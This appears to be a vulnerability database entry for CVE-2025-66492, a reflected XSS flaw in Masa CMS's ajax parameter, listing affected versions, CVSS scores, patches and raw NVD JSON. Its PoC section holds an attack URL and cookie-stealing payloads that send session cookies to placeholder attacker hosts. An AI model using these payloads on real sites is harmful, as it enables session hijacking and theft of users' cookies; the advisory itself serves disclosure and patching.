Security Vulnerability Report
CVE-2025-66492 CVSS 8.2 HIGH

CVE-2025-66492

Published: 2025-12-12 05:16:12
Last Modified: 2025-12-22 18:46:26

Description

Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the <head> section of the HTML page. An attacker can execute arbitrary scripts in the context of the user's session, potentially leading to Session Hijacking, Data Theft, Defacement and Malware Distribution. This issue is fixed in versions 7.5.2, 7.4.9, 7.3.14, and 7.2.9. To work around this issue, configure a Web Application Firewall (WAF) rule (e.g., ModSecurity) to block requests containing common XSS payload characters in the ajax query parameter. Alternatively, implement server-side sanitization using middleware to strip or escape dangerous characters from the ajax parameter before it reaches the vulnerable rendering logic.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE (Masa CMS 7.2.8 and all earlier versions)
cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE (Masa CMS 7.3.1 through 7.3.13)
cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE (Masa CMS 7.4.0-alpha.1 through 7.4.8)
cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:* - VULNERABLE (Masa CMS 7.5.0 through 7.5.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-66492 PoC - Masa CMS XSS via ajax parameter -->
<!-- Attack URL -->
https://[target-host]/masacms/?ajax=%3Cscript%3Ealert(document.cookie)%3C/script%3E

<!-- More sophisticated PoC - Session Hijacking -->
<script>
// Steal session cookie
fetch('https://attacker-controlled-server/steal?c=' + encodeURIComponent(document.cookie));
</script>

<!-- PoC to demonstrate cookie theft and exfiltration -->
<script>
var cookies = document.cookie;
var img = new Image();
img.src = 'https://malicious-domain.com/log?cookie=' + btoa(cookies);
</script>

<!-- Automated exploitation payload -->
<svg/onload=fetch('https://attacker.com/api/collect?data='+btoa(document.cookie))>

References

https://github.com/MasaCMS/MasaCMS/commit/376c27196b1e2489888b7a000cdf5c45bb85959e (Patch)
https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-249c-vqwv-43vc (Patch, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66492",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T05:16:12.463",
    "lastModified": "2025-12-22T18:46:26.203",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Masa CMS is an open source Enterprise Content Management platform. Versions 7.2.8 and below, 7.3.1 through 7.3.13, 7.4.0-alpha.1 through 7.4.8 and 7.5.0 through 7.5.1 are vulnerable to XSS when an unsanitized value of the ajax URL query parameter is directly included within the <head> section of the HTML page. An attacker can execute arbitrary scripts in the context of the user's session, potentially leading to Session Hijacking, Data Theft, Defacement and Malware Distribution. This issue is fixed in versions 7.5.2, 7.4.9, 7.3.14, and 7.2.9. To work around this issue, configure a Web Application Firewall (WAF) rule (e.g., ModSecurity) to block requests containing common XSS payload characters in the ajax query parameter. Alternatively, implement server-side sanitization using middleware to strip or escape dangerous characters from the ajax parameter before it reaches the vulnerable rendering logic."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "7.2.9",
                "matchCriteriaId": "F223EBA9-7072-453E-9423-8933DD3A0287"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.3.1",
                "versionEndExcluding": "7.3.14",
                "matchCriteriaId": "5F999D3E-1AEA-45C4-A47B-8D80C565E186"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.4.0",
                "versionEndExcluding": "7.4.9",
                "matchCriteriaId": "1E6D031D-F388-40F4-B31B-B81BC9272EAC"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "7.5.0",
                "versionEndExcluding": "7.5.2",
                "matchCriteriaId": "91729543-F734-4B7B-BE18-DF5B8D99AFD4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MasaCMS/MasaCMS/commit/376c27196b1e2489888b7a000cdf5c45bb85959e",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-249c-vqwv-43vc",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}